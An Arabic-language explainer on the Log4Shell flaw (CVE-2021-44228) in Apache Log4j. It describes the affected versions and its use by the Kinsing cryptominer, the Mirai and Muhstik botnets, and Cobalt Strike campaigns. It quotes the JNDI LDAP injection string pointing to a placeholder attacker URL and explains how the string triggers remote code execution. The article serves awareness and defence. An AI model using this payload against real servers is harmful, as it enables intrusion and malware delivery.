ضعف Log4Shell

في 10 ديسمبر 2021 ، تم إصدار ثغرة أمنية حرجة في منصة التسجيل المستندة إلى Java Apache Log4jعلانية. تم تتبع الثغرة الأمنية باعتبارها CVE-2021-44228 أو Log4Shell ، وتؤثر على إصدارات Log4j من Log4j 2.0-beta9 وحتى 2.14.1. يمكن للجهات الفاعلة في مجال التهديد الاستفادة من الاستغلال لإنشاء وصول غير مصدق عن بُعد أو تنفيذ تعليمات برمجية أو إرسال تهديدات من البرامج الضارة أو جمع المعلومات. يتم تعيين حالة حرجة للثغرة الأمنية حيث يتم استخدام Log4j على نطاق واسع بواسطة تطبيقات المؤسسة والخدمات السحابية.

تفاصيل Log4Shell الفنية

يبدأ الاستغلال مع قيام الفاعل بتغيير وكيل مستخدم متصفح الويب الخاص به. ثم يزورون موقعًا أو يبحثون عن سلسلة معينة موجودة على مواقع الويب بالتنسيق:

$ {jndi: ldap: // [attacker_URL]}

نتيجة لذلك ، ستتم إضافة السلسلة إلى سجلات الوصول لخادم الويب. ثم ينتظر المهاجمون حتى يقوم تطبيق Log4j بتحليل هذه السجلات والوصول إلى السلسلة الملحقة. في هذه الحالة ، سيتم تشغيل الخطأ ، مما يتسبب في قيام الخادم بعمل رد اتصال لعنوان URL الموجود في سلسلة JNDI. يتم إساءة استخدام عنوان URL هذا للتعامل مع أوامر Base64 المشفرة أو فئات Javaبعد ذلك وتنفيذها على الجهاز المخترق.

أصدرت Apache بسرعة إصدارًا جديدًا - Log4j 2.15.0 ، لمعالجة الثغرة وإصلاحها ، ولكن قد تظل كمية كبيرة من الأنظمة الضعيفة غير مُعالجة لفترة طويلة. في الوقت نفسه ، سرعان ما لاحظ ممثلو التهديد ثغرة يوم الصفر في Log4Shell وبدأوا في البحث عن الخوادم المناسبة لاستغلالها. قام مجتمع infosec بتتبع العديد من حملات الهجوم التي تستخدم Log4Shell لتقديم مجموعة واسعة من تهديدات البرامج الضارة.

يُستخدم Log4Shell في هجمات Cryptominer و Botnet و Backdoor وجمع البيانات

كان المجرمون الإلكترونيون الذين يقفون وراء شبكة التعدين المشفرة Kinsing من أوائل الجهات الفاعلة في مجال التهديد التي نفذت Log4Shell في عملياتها. استخدم المتسللون Log4Shell لتقديم الحمولات المشفرة باستخدام Base64 وتشغيل البرامج النصية للقذيفة. يتمثل دور هذه البرامج النصية في تنظيف النظام المستهدف من تهديدات التنقيب عن العملات المشفرة المنافسة قبل تنفيذ برامج Kinsing الضارة الخاصة بها.

اكتشف Netlab 360 الجهات الفاعلة في التهديد باستخدام الثغرة الأمنية لتثبيت إصدارات Mirai و Muhstik botnets على الأجهزة التي تم اختراقها. تم تصميم تهديدات البرامج الضارة هذه لإضافة أنظمة مصابة إلى شبكة من أجهزة وخوادم إنترنت الأشياء ، والتي يمكن للمهاجمين بعد ذلك توجيههم لشن هجمات DDoS (رفض الخدمة الموزعة) أو نشر أجهزة التعدين المشفرةبعد ذلك.

وفقًا لمركز Microsoft Threat Intelligence Center ، تم استهداف Log4j أيضًا من خلال حملات الهجوم التي أسقطت منارات Cobalt Strike. Cobalt Strike هي أداة برمجية شرعية تستخدم لاختبار الاختراق ضد أنظمة أمان الشركة.ومع ذلك ، فإن قدرات الباب الخلفي جعلته جزءًا مشتركًا من ترسانة العديد من مجموعات التهديد. بعد ذلك ، يتم استخدام الوصول غير القانوني من الباب الخلفي إلى شبكة الضحية لتقديم حمولات المرحلة التالية مثل برامج الفدية وسرقة المعلومات وتهديدات البرامج الضارة الأخرى.

يمكن استغلال Log4Shell للحصول على متغيرات البيئة التي تحتوي على بيانات الخادم. بهذه الطريقة ، يمكن للمهاجمين الوصول إلى اسم المضيف واسم نظام التشغيل ورقم إصدار نظام التشغيل واسم المستخدم الذي تعمل تحته خدمة Log4j والمزيد.